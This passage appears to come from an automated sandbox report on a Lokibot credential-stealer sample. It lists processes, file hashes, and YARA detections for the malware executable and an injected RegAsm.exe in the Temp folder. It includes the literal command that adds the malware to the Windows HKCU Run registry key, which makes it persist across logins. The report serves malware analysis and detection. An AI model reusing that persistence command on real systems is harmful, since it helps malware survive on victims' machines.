                                                                                        • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000B.00000002.2181861219.0000000004169000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000000B.00000002.2181861219.0000000004169000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000000B.00000002.2181861219.0000000004169000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2181751190.0000000004101000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000B.00000002.2181751190.0000000004101000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000000B.00000002.2181751190.0000000004101000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000000B.00000002.2181751190.0000000004101000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                        Reputation:low

                                                                                        General

                                                                                        Start time:19:05:11
                                                                                        Start date:05/01/2021
                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:'cmd.exe' /c REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run' /f /v 'jfdts' /t REG_SZ /d 'C:\Users\user\ntrwe.exe'
                                                                                        Imagebase:0x4a4c0000
                                                                                        File size:302592 bytes
                                                                                        MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high

                                                                                        General

                                                                                        Start time:19:05:11
                                                                                        Start date:05/01/2021
                                                                                        Path:C:\Windows\SysWOW64\reg.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run' /f /v 'jfdts' /t REG_SZ /d 'C:\Users\user\ntrwe.exe'
                                                                                        Imagebase:0x8f0000
                                                                                        File size:62464 bytes
                                                                                        MD5 hash:D69A9ABBB0D795F21995C2F48C1EB560
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high

                                                                                        General

                                                                                        Start time:19:05:22
                                                                                        Start date:05/01/2021
                                                                                        Path:C:\Users\user\ntrwe.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:'C:\Users\user\ntrwe.exe'
                                                                                        Imagebase:0xe90000
                                                                                        File size:938440 bytes
                                                                                        MD5 hash:1D11ABB9DAC9B15823D1BCAD2B8B3675
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:.Net C# or VB.NET
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.2194899454.0000000003D59000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000F.00000002.2194899454.0000000003D59000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000000F.00000002.2194899454.0000000003D59000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000000F.00000002.2194899454.0000000003D59000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.2194803649.0000000003CBD000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000F.00000002.2194803649.0000000003CBD000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000000F.00000002.2194803649.0000000003CBD000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000000F.00000002.2194803649.0000000003CBD000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.2194883394.0000000003D3F000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000F.00000002.2194883394.0000000003D3F000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000000F.00000002.2194883394.0000000003D3F000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000000F.00000002.2194883394.0000000003D3F000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.2194844744.0000000003CF1000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000F.00000002.2194844744.0000000003CF1000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000000F.00000002.2194844744.0000000003CF1000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000000F.00000002.2194844744.0000000003CF1000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.2194860595.0000000003D0B000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000F.00000002.2194860595.0000000003D0B000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000000F.00000002.2194860595.0000000003D0B000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000000F.00000002.2194860595.0000000003D0B000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.2193389507.0000000002792000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000F.00000002.2193389507.0000000002792000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000000F.00000002.2193389507.0000000002792000.00000004.00000001.sdmp, Author: Joe Security
Antivirus matches:
• Detection: 100%, Joe Sandbox ML
Reputation: low

General

Start time: 19:05:23
Start date: 05/01/2021
Path: C:\Users\user\ntrwe.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\ntrwe.exe'
Imagebase: 0xe90000
File size: 938440 bytes
MD5 hash: 1D11ABB9DAC9B15823D1BCAD2B8B3675
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Reputation: low

General

Start time: 19:05:24
Start date: 05/01/2021
Path: C:\Users\user\AppData\Local\Temp\RegAsm.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Local\Temp\RegAsm.exe
Imagebase: 0x250000
File size: 64672 bytes
MD5 hash: ADF76F395D5A0ECBBF005390B73C3FD2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.2351105842.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000011.00000002.2351105842.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000011.00000002.2351105842.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Loki_1, Description: Loki Payload, Source: 00000011.00000002.2351105842.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
• Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000011.00000002.2351105842.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Antivirus matches:
• Detection: 0%, Metadefender
• Detection: 0%, ReversingLabs
Reputation: moderate

General

Start time: 19:05:31
Start date: 05/01/2021
Path: C:\Users\user\ntrwe.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\ntrwe.exe'
Imagebase: 0xe90000
File size: 938440 bytes
MD5 hash: 1D11ABB9DAC9B15823D1BCAD2B8B3675
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000002.2213431587.0000000003CF1000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000012.00000002.2213431587.0000000003CF1000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000012.00000002.2213431587.0000000003CF1000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000012.00000002.2213431587.0000000003CF1000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000002.2212693514.0000000002790000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000012.00000002.2212693514.0000000002790000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000012.00000002.2212693514.0000000002790000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000002.2213384290.0000000003CBD000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000012.00000002.2213384290.0000000003CBD000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000012.00000002.2213384290.0000000003CBD000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000012.00000002.2213384290.0000000003CBD000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000002.2213452314.0000000003D0B000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000012.00000002.2213452314.0000000003D0B000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000012.00000002.2213452314.0000000003D0B000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000012.00000002.2213452314.0000000003D0B000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000002.2213472587.0000000003D3F000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000012.00000002.2213472587.0000000003D3F000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000012.00000002.2213472587.0000000003D3F000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000012.00000002.2213472587.0000000003D3F000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000002.2213485795.0000000003D59000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000012.00000002.2213485795.0000000003D59000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000012.00000002.2213485795.0000000003D59000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000012.00000002.2213485795.0000000003D59000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low

General

Start time: 19:05:33
Start date: 05/01/2021
Path: C:\Users\user\AppData\Local\Temp\RegAsm.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Local\Temp\RegAsm.exe
Imagebase: 0x1230000
File size: 64672 bytes
MD5 hash: ADF76F395D5A0ECBBF005390B73C3FD2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000013.00000002.2208511718.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000013.00000002.2208511718.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000013.00000002.2208511718.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Loki_1, Description: Loki Payload, Source: 00000013.00000002.2208511718.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
• Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000013.00000002.2208511718.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: moderate

Disassembly

Code Analysis
